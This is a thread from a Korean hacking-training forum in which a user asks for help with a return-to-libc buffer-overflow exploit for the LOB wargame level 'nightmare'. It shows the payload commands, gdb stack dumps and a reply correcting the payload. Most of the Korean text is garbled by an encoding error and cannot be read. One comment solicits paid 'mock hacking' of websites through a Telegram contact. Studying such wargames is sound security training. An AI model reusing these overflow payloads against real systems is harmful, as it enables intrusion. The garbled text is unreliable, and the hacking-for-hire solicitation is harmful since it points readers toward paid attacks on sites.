½Ã½ºÅÛ ÇØÅ·

 1574, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   turttle2s
   [LOB Redhat] succubus -> nightmare

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1981 [º¹»ç]


µµÀúÈ÷ ÀÌÇØ°¡ ¾È°¡¼­ Áú¹®µå¸³´Ï´Ù


Á¦°¡ ¿øÇÏ´Â ½Ã³ª¸®¿À´Â,

strpy·Î 'AAAA'ÀÇ À§Ä¡¿¡ RTLÄڵ尡 µé¾îÀִ ȯ°æº¯¼öÀÇ ÁÖ¼Ò¸¦ º¹»çÇؼ­ strcpy°¡ ³¡³­ ÈÄ ret½Ã RTLÀÌ ½ÇÇàµÇ°Ô ÇÏ´Â °Í ÀÔ´Ï´Ù.

ÀÏ´Ü RTL Äڵ尡 µé¾îÀִ ȯ°æº¯¼ö¸¦ ¸¸µì´Ï´Ù.

================================================
$ export WEAPON=`python -c 'print "\xe0\x8a\x05\x40"+"aaaa"+"\xf9\xbf\x0f\x40"+"\x90"*1000'`
================================================
"\x90"*1000 Àº Á¦°¡ ȯ°æº¯¼ö À§Ä¡¸¦ ã±â ÆíÇÏ°Ô ÇϱâÀ§ÇØ Ãß°¡Çß½À´Ï´Ù.

ÀÌÁ¦ºÎÅÍ ÆíÀÇ»ó ȯ°æº¯¼ö¸¦ "RTL ÄÚµå" ¶ó°í ºÎ¸£°Ú½À´Ï´Ù.

±×¸®°í core ÆÄÀÏ »ý¼ºÀ» À§ÇØ ¾Æ·¡ payload¸¦ ³Ö½À´Ï´Ù.
================================================

./nightmare `python -c 'print "a"*44+"\x10\x84\x04\x08"+"AAAA"+"BBBB"+"CCCC"+"DDDD"'`
================================================

1. "AAAA"´Â ¹®Á¦¿¡¼­ ºÙ¿©ÁÖ´Â ¹®ÀÚ¿­ ÀÔ´Ï´Ù.
2. "BBBB"´Â "AAAA"ÀÇ ÁÖ¼ÒÀÔ´Ï´Ù. RTL ÄÚµåÀÇ ÁÖ¼Ò·Î ¹Ù²î°Ô ÇÒ °ÍÀÔ´Ï´Ù.
3. "CCCC"´Â "DDDD"ÀÇ ÁÖ¼ÒÀÔ´Ï´Ù. strcpy()¿¡¼­ CCCC¸¦ Æ÷ÀÎÅÍ·Î »ç¿ëÇϱ⠶§¹®¿¡ "AAAA"¿¡´Â "DDDD"°ªÀÌ µé¾î°¡°Ô µÉ°ÍÀÔ´Ï´Ù.
4. "DDDD"´Â RTL ÄÚµåÀÇ ÁÖ¼ÒÀÔ´Ï´Ù.


±×¸®°í gdb·Î core ÆÄÀÏÀ» ¿­¾îº¾´Ï´Ù.
================================================
strcpy (dest=0x42424242 <Address 0x42424242 out of bounds>, src=0x43434343 <Address 0x43434343 out of bounds>)
    at ../sysdeps/generic/strcpy.c:37
../sysdeps/generic/strcpy.c: No such file or directory.
================================================
ÀÏ´Ü strcpy.c °¡ ¾ø´Ù°í ¶å´Ï´Ù. (ÀÌ ¿À·ù°¡ ¿Ö ¶ß´ÂÁö´Â ¸ð¸£°Ú½À´Ï´Ù. óÀ½¿¡´Â gdb»ó¿¡¼­ Á¢±ÙÀÌ ¾ÈµÇ±â ¶§¹®¿¡ Àú·± ¿À·ù°¡ ¶ß´Â°É·Î ¾Ë°íÀÖ¾ú´Âµ¥ strcpyÀÇ ÄÚµå´Â À߸¸ º¸¿©ÁÖ´õ±º¿ä;;)



¿©±â¼­ ù¹ø°·Î ÀÌÇØ°¡ ¾ÈµÇ´Â ºÎºÐÀÔ´Ï´Ù.
================================================
(gdb) x/30wx $esp
0xbffff688:        "0x4000ae60"        0x61616161        0x41414141        0x42424242
0xbffff698:        0x43434343        0x44444444        0x00000000        0x08048420
0xbffff6a8:        0x00000000        0x08048441        0x080486b4        0x00000002
0xbffff6b8:        0xbffff6d4        0x08048350        0x0804877c        0x4000ae60
0xbffff6c8:        0xbffff6cc        0x40013e90        0x00000002        0xbffff7e0
0xbffff6d8:        0xbffff7ec        0x00000000        0xbffff82d        0xbffff84a
0xbffff6e8:        0xbffff863        0xbffff882        0xbffffc7e        0xbffffca0
0xbffff6f8:        0xbffffcae        0xbffffe71
================================================

Á¦°¡ "·Î ¹­¾î³õÀº ºÎºÐÀÔ´Ï´Ù.
Àú ÁÖ¼ÒÀÇ Äڵ带 º¸´Ï <_dl_fini> ºÎºÐÀ¸·Î ³ª¿À´õ±º¿ä.. ¿Ö °©ÀÚ±â Àú°Ô »ý°å´ÂÁö ¸ð¸£°Ú°í,
±× µÚÀÇ 4¹ÙÀÌÆ®¸¦ º¸½Ã¸é 0x61616161 ÀÌ µé¾îÀÖ½À´Ï´Ù. ¿ø·¡ strcpy@plt ÀÚ¸®¿¡ ¸»ÀÌÁÒ.


À̰͸»°íµµ ÀÌÇØ°¡ ¾ÈµÇ´Â ºÎºÐÀÌ ´õ Àִµ¥, ±ÛÀ» ¾²´Ùº¸´Ï ÀÌ ¹®Á¦¸¦ ¸ÕÀú ÇØ°áÇÏ°í ³ª¼­ »ðÁúÀ» ´õ ÇغÁ¾ß°Ú´Ù´Â »ý°¢¿¡ ÀÏ´Ü ¿©±â±îÁö¸¸ Áú¹®µå·Áº¾´Ï´Ù.

¼­Å¥¹ö½ºÇÑÅ× Á¦´ë·Î °É¸° °Í °°½À´Ï´Ù ¤Ð¤Ð¤Ð  here to stay.....





  Hit : 1648     Date : 2019/09/26 08:15



    
ss4747 ¾È³çÇϼ¼¿ä!!

¸ðÀÇÇØÅ· °¡´ÉÀÚ ¸ðÁý ÁßÀÎ Çؿܾ÷üÀÔ´Ï´Ù

¾÷¹«ÀÇ ÁøÇà¹æ½ÄÀº ÇÁ¸®·£¼­ Çü½ÄÀ¸·Î ÀúÈñ°¡ Á¦°øÇص帰

»çÀÌÆ® ¸ðÀÇÇØÅ· ¼º°ø½Ã °Ç´ç À¸·Î Áö±ÞÇص帳´Ï´Ù

ÀÚ¼¼ÇѾȳ»»çÇ×¹× ±âŸ¹®ÀÇ´Â ÅÚ·¡±×·¥ ss4747 ¿©±â·Î ¿¬¶ôÁÖ½Ã¸é »ó¼¼ÇÏ°Ô ¾Ë·Áµå¸®°Ú½À´Ï´Ù
2019/10/04  
dnjsdnwja "AAAA"À» ¿øÇÏ´Â return address("\xe0\x8a\x05\x40")·Î ¹Ù²Ù°í µÚÀÇ argument¸¦ passÇØÁÖ±â À§Çؼ­´Â, "CCCC"¿¡ DDDDÀÇ ÁÖ¼Ò¸¦ ³ÖÁö¾Ê°í ±× ÀÚ¸®¿¡ ±×³É DDDD¸¦ ³Ö¾î¾ß ÇÒ °ÍÀ¸·Î º¸À̳׿ä.

¸¸¾à "CCCC"¿¡ DDDDÀÇ ÁÖ¼Ò¸¦ ³ÖÀ¸½Å´Ù¸é "AAAA"¿¡´Â ±×³É ȯ°æº¯¼ö ÁÖ¼Ò¸¸ µé¾î°¡°í ÀÌ°ÍÀº ¿øÇϽô °á°ú°¡ ¾Æ´Ï¶ó°í »ý°¢µË´Ï´Ù.
2019/12/18  
turttle2s dnjsdnwja

´äº¯ °¨»çÇÕ´Ï´Ù. ÀÌÁ¦ ºÃ¾î¿ä ¤»¤» »ý°¢Çغ¸´Ï±î Á¦°¡ ½ÅÁßÄ¡ ¸øÇ߳׿ä..
2019/12/23  
1574   pwnable.kr echo1 Áú¹®2 (½ºÆ÷ ÁÖÀÇ)[2]     turttle2s
10/05 1180
1573   LOB GATE¹®Á¦ Ç®¸é¼­ ±Ã±ÝÇÑÁ¡[3]     hackxx123
08/24 842
1572   libc°ü·Ã - 2[5]     lMaxl04
08/24 837
1571   ASLRÀÌ °É·ÁÀÖÀ»¶§ ret¿¡ ROPÀ¸·Î jmp %espÀ» »ç¿ëÇÑ °æ¿ì.[3]     lMaxl04
06/29 1094
1570   ¸®¸ðÆ® ȯ°æ¿¡¼­ÀÇ ½ºÅà ÁÖ¼Ò È®ÀÎ ¹æ¹ýÀÌ ±Ã±ÝÇÕ´Ï´Ù.[2]     lMaxl04
06/16 895
1569   ÇØÅ· ÇÁ¸®¼­¹ö ¾ø¾îÁ³³ª¿ä?[1]     terfkim
04/15 1671
1568   ½ºÅÿ¡ µ¥ÀÌÅÍ ³ÖÀ» ¶§ SIGSEGV[4]     turttle2s
02/04 1407
1567   pwnable.kr echo1 Áú¹®[2]     turttle2s
06/17 1682
1566   ROP strcpy °ü·Ã Áú¹®ÀÔ´Ï´Ù.[3]     heeyoung0511
06/16 1536
1565   Level2 -> Level3 ¿¡¼­ vi¿Í /usr/bin/EditorÀÇ Â÷ÀÌ[2]     hyemin1826
07/18 1762
1564   Trainer3 ftz.hackerschool.org È£½ºÆ® Á¢¼Ó ºÒ°¡[1]     hyemin1826
07/18 3161
1563   dllÀÎÁ§¼Ç ½ÇÇèÁß Áú¹® µå¸³´Ï´Ù.[1]     kkk477
05/31 1806
1562   ÆÐŶ º¹È£È­¸¦ ¸¶½ºÅÍ ÇÏ·Á¸é ¾î¶² °úÁ¤ÀÌ ÀÖ¾î¾ßÇϳª¿ä?     sa0814
04/01 1654
1561   »ç±â[2]     jas08
03/31 1946
1560   ½Ã½ºÅÛ ÄÝÀÌ °¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ª°ú ºÒ°¡´ÉÇÑ ¸Þ¸ð¸® ¿µ¿ªÀÌ Á¸ÀçÇϳª¿ä?     ocal
03/30 1693
1559   pwntools »ç¿ë½Ã¿Í ±âº» socket ¸ðµâ ÀÌ¿ë½Ã Â÷ÀÌ?[4]     ocal
01/09 2223
1558   lob level19(nightmare) °ü·ÃÁú¹®[1]     dnjsdnwja
12/18 1703
1557   ftz level2 Áú¹®ÀÖ½À´Ï´Ù[1]     kihyun1998
12/13 1794
1556   ftz level2¹ø Ǫ´Âµ¥¿ä ±ÇÇÑÀÌ...     kihyun1998
12/06 1669
1555   ½Ã½ºÅÛÇØÅ·ÇÒ¶§ [3]     thsrhkdwns
12/05 2138
1 [2][3][4][5][6][7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org